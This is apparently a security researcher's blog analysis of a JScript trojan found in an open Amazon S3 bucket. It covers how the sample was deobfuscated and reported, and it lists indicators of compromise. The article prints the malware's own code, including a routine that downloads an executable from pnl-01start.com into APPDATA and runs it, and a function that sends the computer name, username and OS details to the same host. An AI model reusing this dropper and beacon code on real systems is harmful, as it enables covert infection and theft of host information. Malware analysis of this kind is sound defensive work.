Deobfuscation and Understand a trojan JScript


Italian Article

Over 50% of cyber attacks are executed through malware, whose job is to find a flaw to inject other types of viruses including malware, adware and much more. Knowing the computer remotely, it can spy on the screen and even crypt the files: a wrong click and you lose anything.

It is estimated that more than 100 malicious programs are built every week; there are companies that develop protections and security systems for this type of attack. But sometimes the attacks are so elaborate and technically accurate than a normal antivirus cannot do anything unless the attack is immediately reported.

The malware-analyst teams of security-solutions companies - such as Kapersky, Avira - analyze hundreds and hundreds of programs every day to investigate more about the results of tests conducted by the antivirus. Sometimes it happens a file may not be a malicious program. In case it is malicious, they add the program to the huge database of files considered "dangerous" which will be scanned by the security system.

In this article I will write about how I could deobfuscate and understand the trojan, analyzing details and techniques to evade every defense; I will also discuss the practices that have led me to report the fact to several companies, whose task is to shield users from a possible attack.

How I found the Trojan

The Trojan was in an unsecured bucket of Amazon S3 (hxxo://bitcoin01.s3-us-west-2.amazonaws.com/). At the beginning I thought I was "stumbled" in the usual fake-bitcoin miner, but soon I realized that it was not so.

The repositorycalled Bitcoin01 contains 6 different file extension .zip (Bitcoin_BitPlugin01ogM35p61DK.zip, Bitcoin_BitPlugin01wVvhtFEk9i.zip, Bitcoin_BitPlugin02NMstTThdHG.zip, Bitcoin_BitPlugin02qFIbpMQSWn.zip, Bitcoin_BitPluginYqzkb3k7hd.zip, Bitcoin_BitPluginlOvjgETbzM.zip) (date : 16th April 2018).

Each zipped file contains a file developed in JScript, encoded via an encrypter to try to evade AntiMalware.

Opened Bitcoin_BitPlugin02qFlbpMQSWn.js file , some strings sounded strange to me. Variables such as "runasadmin" , "getFile" , "dwlFile" made me assume that the file could be a Trojan. From the beginning, the "how" and in what platform the trojan could be used were clear.

The Microsoft Windows operating system has as a system utility a program called WSCRIPT.exe or "Windows Script Host" to run scripts programmed in certain proprietary scripting languages derived from programming languages such as PHP, Javascript ect ..

This script has been programmed in the JScript scripting language. It is the implementation of a language very similar to Javascript for the development of automated commands on Microsoft Windows platforms (all versions since Windows 98 have had wscript.exe).

Deobfuscate the trojan


The script initially seemed to have been encrypted with some sort of algorithm to "scare off" the researcher, but JScript is a very simple language to understand and decode because it is very similar to Javascript. In fact, it was enough to run the code on a normal browser and a little console.log to capture the decrypted code before it was executed.


	var runAsAdmin, dlToFile, getPathFromGuid, getPathFromGuidWow, fileExists, folderExists, getEnv, randomStr, runAsUser, dlToText, base64ToBinary, getCountryName, getLanguage, dataPost, getSO, SendInfect, Prosseguir, Marcar, Arrochar; + function() {
    var jHA = '',
        zbg = 567 - 556;

    function ByH(t) {
        var r = 28357;
        var f = t.length;
        var c = [];
        for (var o = 0; o < f; o++) {
            c[o] = t.charAt(o)
        };
        for (var o = 0; o < f; o++) {
            var y = r * (o + 180) + (r % 16345);
            var q = r * (o + 85) + (r % 31629);
            var p = y % f;
            var i = q % f;
            var n = c[p];
            c[p] = c[i];
            c[i] = n;
            r = (y + q) % 4249218;
        };
        return c.join('')
    };
    var XmY = ByH('nsrottkctomqbzdvhcepunoiusrycxrjlgfaw').substr(0, zbg);
Full raw code From a quick glance of the obfuscated code, I have confirmation of what was said before: the trojan is executable in Microsoft Windows systems. The eye immediately skips a very particular detail, a domain that may seem reliable, "hxxps: //pnl-01start.com/". Opening it, however, an error message "Unauthorized" (401 error) appeared.

After that, I sent the website to VirusTotal. As a result, I get that most of the tested antiviruses guarantee the validity of the site, showing it as a "clean site", others have little information to make a judgment and therefore show me "Unrated site".

What is the purpose of such a domain? The answer is in the code. Looking "more closely" the function called "Arrochar" you can immediately notice how the domain is used to download an exe, still unknown to me since the domain gave me a 401 error, whose name is given by RandomStr (). At a later time, the function calls "SendInfect" to trace the information of your computer and send it to a sort of API built on the domain mentioned above.

If we take a look at the "SendInfect" function, it invokes another "GetEnv" function to take the environment variables such as "COMPUTERNAME" , "USERNAME" and the version of the operating system used by the user.


function getEnv(_0xDF9B) {
        try {
            var _0xDFED = WScript.CreateObject("WScript.Shell");
            return _0xDFED.ExpandEnvironmentStrings("%" + _0xDF9B + "%")
        } catch (e) {};
        return ""
    }

function SendInfect(_0xE03F, _0xDF9B) {
        var _0xDFED = "country=" + getCountryName() + "&l=" + getLanguage() + "&c=" + getEnv("COMPUTERNAME") + "&u=" + getEnv("USERNAME") + "&s=" + getSO();
        DataPost(_0xE03F, _0xDF9B, _0xDFED)
}

The malware would seem a trivial tracker implemented by who knows what person you wanted to have fun, but there is still a fact that sounds strange. In the "Arrochar" function (below), before the "SendInfect" function, the script downloads a folder created with a random string, a malware coming from (a raw data exe) from the same website. The same downloaded malware will be run.


function Arrochar(dataPost, _0xE2CF) {
        try {
            var response = dlToText(dataPost + "?q", _0xE2CF);
            if ((response == "1") && (Prosseguir())) {
                var object = WScript.CreateObject("Scripting.FileSystemObject");
                var appData = getEnv("APPDATA") + "\\\\" + randomStr(6);
                object.CreateFolder(appData);
                var response_b = dlToText(dataPost + "?w", _0xE2CF);
                if (reponse_b) {
                    var _0xE0E3 = appData + "\\\\" + randomStr(6) + ".exe";
                    var _0xE03F = dlToFile(dataPost + "?e", _0xE2CF, _0xE0E3);
                    var _0xDF9B = dlToFile(dataPost + "?r", _0xE2CF, _0xE321 + "\\\\" + _0xE091);
                    if (_0xE03F && _0xDF9B) {
                        runAsUser(_0xE0E3);
                        SendInfect(dataPost + "?t", _0xE2CF);
                        Marcar()
                    }
                }
            }
        } catch (e) {}
    }
    
    Arrochar("https://pnl-01start.com/", "padrao")

It is interesting to see how the same person has implemented a sort of protection to prevent anyone from reaching the malware downloaded from the first (code below). The pnl-01start.com domain checks if the user has a header called "x-auth" containing the "header" variable. If we take a look at the variable "header" corresponds to "padrao". Only at this point the domain "recognizes" the connection of the script and starts the file download.


function dlToFile(url, header, _0xDF9B) {
        try {
            var xmlhttp = WScript.CreateObject("MSXML2.XMLHTTP");
            xmlhttp.Open("GET", url + "&=" + Math.floor((Math.random() * 999999999) + 1), false);
            xmlhttp.SetRequestHeader("x-auth", header);
            xmlhttp.Send();
            if (xmlhttp.Status == 200) {
                var adodb = WScript.CreateObject("ADODB.Stream");
                adodb.Type = 1;
                adodb.Open();
                adodb.Write(xmlhttp.ResponseBody);
                adodb.SaveToFile(_0xDF9B, 2);
                adodb.Close();
                return true
            }
        } catch (e) {};
        return false
    }

It checks if this script was ran before too!


  {
            ...
            var response = dlToText(dataPost + "?q", _0xE2CF);
            if ((response == "1") && (Prosseguir())) ...
    }
            
    function Prosseguir() {
        var _0xDF9B = WScript.CreateObject("Scripting.FileSystemObject");
        var _0xDFED = getEnv("APPDATA") + "\\\\" + WScript.ScriptName;
        return _0xDF9B.FileExists(_0xDFED) == false
    }

Resolution and reporting


Timely, I uploaded the script on a popular online virus disassembler and a user(@DissectMalware on Twitter) has already started to deobfuscate that and he reported the file to CloudFlare where the domain was pointed to. In the beginning, the antivirus didn't find any warnings about the file (see screenshots), but after some hours Hybrid-analysis started to mark that file as malicious.

Before
Before
After the reporting
Re-cap

Technical Information

Domini
bitcoin01.s3-us-west-2.amazonaws.com
pnl-01start.com 
 
IP
178.255.83.1
Sha256 of file called Bitcoin_BitPlugin02qFIbpMQSWn.js :
5ff0529719df26f5589074f5efab1aab0fdf8e514054d14c2ab04ecbb9683156
Sha256 of file called Bitcoin_BitPlugin02qFIbpMQSWn.zip :
3c36290b0c619722e582974fc95d1cabf5d3c8ad5d735db7c1ebb0996075ef03

About Me
Hi, I am SerHack. A developer and security researcher.